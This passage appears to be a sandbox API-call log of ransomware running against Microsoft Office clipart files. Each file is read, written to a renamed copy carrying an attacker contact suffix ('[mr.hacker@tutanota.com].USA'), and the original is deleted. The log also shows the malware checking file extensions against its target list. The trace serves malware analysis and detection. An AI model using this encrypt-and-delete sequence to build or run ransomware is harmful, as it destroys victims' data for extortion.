office\\clipart\\pub60cor\\en00006_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0270.937] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.937] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0270.945] GetLastError () returned 0x0 [0270.945] ReadFile (in: hFile=0x3a4, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x3670, lpOverlapped=0x0) returned 1 [0270.946] WriteFile (in: hFile=0x39c, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x3680, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x3680, lpOverlapped=0x0) returned 1 [0270.947] ReadFile (in: hFile=0x3a4, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.947] WriteFile (in: hFile=0x39c, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.947] SetEndOfFile (hFile=0x39c) returned 1 [0270.947] CloseHandle (hObject=0x39c) returned 1 [0270.947] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.947] SetEndOfFile (hFile=0x3a4) returned 1 [0270.949] CloseHandle (hObject=0x3a4) returned 1 [0270.949] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.975] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf")) returned 1 [0270.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63 [0270.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63 [0270.976] lstrlenW (lpString=".doc") returned 4 [0270.976] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.976] lstrlenW (lpString=".docx") returned 5 [0270.976] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.976] lstrlenW (lpString=".pdf") returned 4 [0270.976] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.976] lstrlenW (lpString=".xls") returned 4 [0270.976] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.976] lstrlenW (lpString=".xlsx") returned 5 [0270.976] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.976] lstrlenW (lpString=".ppt") returned 4 [0270.976] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63 [0270.976] lstrlenW (lpString=".zip") returned 4 [0270.976] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.976] lstrlenW (lpString=".rar") returned 4 [0270.976] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.976] lstrlenW (lpString=".bz2") returned 4 [0270.976] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.976] lstrlenW (lpString=".7z") returned 3 [0270.976] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63 [0270.976] lstrlenW (lpString=".dbf") returned 4 [0270.977] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63 [0270.977] lstrlenW (lpString=".1cd") returned 4 [0270.977] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63 [0270.977] lstrlenW (lpString=".jpg") returned 4 [0270.977] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63 [0270.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63 [0270.977] lstrlenW (lpString=".doc") returned 4 [0270.977] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.977] lstrlenW (lpString=".docx") returned 5 [0270.977] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.977] lstrlenW (lpString=".pdf") returned 4 [0270.977] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.977] lstrlenW (lpString=".xls") returned 4 [0270.977] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.977] lstrlenW (lpString=".xlsx") returned 5 [0270.977] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.977] lstrlenW (lpString=".ppt") returned 4 [0270.977] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63 [0270.977] lstrlenW (lpString=".zip") returned 4 [0270.977] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.977] lstrlenW (lpString=".rar") returned 4 [0270.977] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.977] lstrlenW (lpString=".bz2") returned 4 [0270.978] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.978] lstrlenW (lpString=".7z") returned 3 [0270.978] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63 [0270.978] lstrlenW (lpString=".dbf") returned 4 [0270.978] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63 [0270.978] lstrlenW (lpString=".1cd") returned 4 [0270.978] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63 [0270.978] lstrlenW (lpString=".jpg") returned 4 [0270.978] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.978] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.978] lstrlenW (lpString="EN00397_.WMF") returned 12 [0270.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00397_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.978] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=17308) returned 1 [0270.978] CloseHandle (hObject=0x384) returned 1 [0270.979] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00397_.wmf")) returned 0x20 [0270.979] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00397_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00397_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.979] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.979] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00397_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0270.979] GetLastError () returned 0x0 [0270.979] ReadFile (in: hFile=0x384, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x439c, lpOverlapped=0x0) returned 1 [0270.984] WriteFile (in: hFile=0x394, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x43a0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x43a0, lpOverlapped=0x0) returned 1 [0270.985] ReadFile (in: hFile=0x384, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.985] WriteFile (in: hFile=0x394, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.985] SetEndOfFile (hFile=0x394) returned 1 [0270.985] CloseHandle (hObject=0x394) returned 1 [0270.985] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.985] SetEndOfFile (hFile=0x384) returned 1 [0270.987] CloseHandle (hObject=0x384) returned 1 [0270.987] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.988] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00397_.wmf")) returned 1 [0270.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63 [0270.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63 [0270.988] lstrlenW (lpString=".doc") returned 4 [0270.988] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.988] lstrlenW (lpString=".docx") returned 5 [0270.988] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.988] lstrlenW (lpString=".pdf") returned 4 [0270.988] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.988] lstrlenW (lpString=".xls") returned 4 [0270.988] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.988] lstrlenW (lpString=".xlsx") returned 5 [0270.988] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.988] lstrlenW (lpString=".ppt") returned 4 [0270.988] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63 [0270.988] lstrlenW (lpString=".zip") returned 4 [0270.988] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.988] lstrlenW (lpString=".rar") returned 4 [0270.988] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.988] lstrlenW (lpString=".bz2") returned 4 [0270.988] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.989] lstrlenW (lpString=".7z") returned 3 [0270.989] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63 [0270.989] lstrlenW (lpString=".dbf") returned 4 [0270.989] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63 [0270.989] lstrlenW (lpString=".1cd") returned 4 [0270.989] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63 [0270.989] lstrlenW (lpString=".jpg") returned 4 [0270.989] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63 [0270.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63 [0270.989] lstrlenW (lpString=".doc") returned 4 [0270.989] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.989] lstrlenW (lpString=".docx") returned 5 [0270.989] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.989] lstrlenW (lpString=".pdf") returned 4 [0270.989] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.989] lstrlenW (lpString=".xls") returned 4 [0270.989] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.989] lstrlenW (lpString=".xlsx") returned 5 [0270.989] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.989] lstrlenW (lpString=".ppt") returned 4 [0270.989] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63 [0270.989] lstrlenW (lpString=".zip") returned 4 [0270.989] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.990] lstrlenW (lpString=".rar") returned 4 [0270.990] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.990] lstrlenW (lpString=".bz2") returned 4 [0270.990] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.990] lstrlenW (lpString=".7z") returned 3 [0270.990] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63 [0270.990] lstrlenW (lpString=".dbf") returned 4 [0270.990] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63 [0270.990] lstrlenW (lpString=".1cd") returned 4 [0270.990] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63 [0270.990] lstrlenW (lpString=".jpg") returned 4 [0270.990] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.990] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.990] lstrlenW (lpString="FD00074_.WMF") returned 12 [0270.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.991] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=17850) returned 1 [0270.991] CloseHandle (hObject=0x384) returned 1 [0270.991] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf")) returned 0x20 [0270.991] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.991] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.991] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0270.992] GetLastError () returned 0x0 [0270.992] ReadFile (in: hFile=0x384, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x45ba, lpOverlapped=0x0) returned 1 [0270.993] WriteFile (in: hFile=0x394, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x45c0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x45c0, lpOverlapped=0x0) returned 1 [0270.994] ReadFile (in: hFile=0x384, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.994] WriteFile (in: hFile=0x394, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.994] SetEndOfFile (hFile=0x394) returned 1 [0270.994] CloseHandle (hObject=0x394) returned 1 [0270.994] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.995] SetEndOfFile (hFile=0x384) returned 1 [0270.997] CloseHandle (hObject=0x384) returned 1 [0270.997] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.998] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf")) returned 1 [0270.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0270.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0270.998] lstrlenW (lpString=".doc") returned 4 [0270.998] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.998] lstrlenW (lpString=".docx") returned 5 [0270.998] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.998] lstrlenW (lpString=".pdf") returned 4 [0270.998] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.998] lstrlenW (lpString=".xls") returned 4 [0270.998] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.998] lstrlenW (lpString=".xlsx") returned 5 [0270.998] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.998] lstrlenW (lpString=".ppt") returned 4 [0270.998] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0270.998] lstrlenW (lpString=".zip") returned 4 [0270.998] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.998] lstrlenW (lpString=".rar") returned 4 [0270.998] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.998] lstrlenW (lpString=".bz2") returned 4 [0270.999] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.999] lstrlenW (lpString=".7z") returned 3 [0270.999] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0270.999] lstrlenW (lpString=".dbf") returned 4 [0270.999] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0270.999] lstrlenW (lpString=".1cd") returned 4 [0270.999] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0270.999] lstrlenW (lpString=".jpg") returned 4 [0270.999] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0270.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0270.999] lstrlenW (lpString=".doc") returned 4 [0270.999] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.999] lstrlenW (lpString=".docx") returned 5 [0270.999] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.999] lstrlenW (lpString=".pdf") returned 4 [0270.999] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.999] lstrlenW (lpString=".xls") returned 4 [0270.999] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.999] lstrlenW (lpString=".xlsx") returned 5 [0270.999] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.999] lstrlenW (lpString=".ppt") returned 4 [0270.999] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0270.999] lstrlenW (lpString=".zip") returned 4 [0270.999] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.000] lstrlenW (lpString=".rar") returned 4 [0271.000] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.000] lstrlenW (lpString=".bz2") returned 4 [0271.000] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.000] lstrlenW (lpString=".7z") returned 3 [0271.000] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0271.000] lstrlenW (lpString=".dbf") returned 4 [0271.000] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0271.000] lstrlenW (lpString=".1cd") returned 4 [0271.000] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0271.000] lstrlenW (lpString=".jpg") returned 4 [0271.000] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.000] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.000] lstrlenW (lpString="FD00076_.WMF") returned 12 [0271.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00076_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.001] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=11994) returned 1 [0271.001] CloseHandle (hObject=0x384) returned 1 [0271.001] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00076_.wmf")) returned 0x20 [0271.001] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00076_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00076_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.001] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.001] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.001] 